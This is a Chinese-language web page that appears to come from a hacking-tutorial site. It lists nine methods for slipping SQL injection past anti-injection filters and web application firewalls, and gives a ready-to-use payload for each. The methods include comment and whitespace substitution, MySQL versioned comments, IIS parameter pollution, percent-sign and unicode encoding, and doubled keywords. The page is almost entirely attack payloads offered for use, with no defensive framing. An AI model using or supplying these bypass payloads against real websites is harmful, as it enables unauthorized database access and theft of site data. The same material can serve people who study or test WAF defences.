|
繞過防注入系統 包括WAF的測試等多個方案 灰鴿子下載
方案一、 把測試代碼的空格替換成 /**/ 或者+ (注:/**/ 和+ 不要進行url編碼)
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02
03 如: id=1 or 1=1
id=1/**/or/**/1=1
id=1+or+1=1
方案二、把空格替換成非可見字符 %09 %0A %0D %0B
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02
03
04 如: id=1 or 1=1
id=1%09or%091=1
id=1%0Aor%0A1=1
id=1%0A%0Bor%0A%0B1=1
方案三、把關鍵字用 /*!*/包起來,注,這個方法只適用于mysql數據庫的站點
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02 如: id=1 and 1=1
id=1 /*!and*/1=1
方案四、使用參數污染法攻擊繞過,注,該方法只適用于webserver是微軟的IIS的情況下
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02 如: id=1 union select 1 from admin
id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
方案五、使用%繞過,注,該方法只適用于asp/aspx
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02 如: id=1 union select 1 from admin
id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
方案六、使用%23 (明文為#號)和%0A配合使用繞過,注,這個方法只適用于mysql數據庫的站點
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02 如: id=1 union select 1 from admin
id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
方案七、使用重復關鍵字繞過
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02 如: id=1 union select 1 from admin
id=1 ununionion seleselectct 1 frofromm admin
方案八、使用unicode編碼繞過
?
如果要保持原樣復制代碼,需要雙擊后,選擇代碼右鍵復制即可
01
02 如: id=1 union select 1 from admin
id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
方案九、使用畸形包繞過,只適用于 asp/aspx,詳情可以看80sec的站點
|
|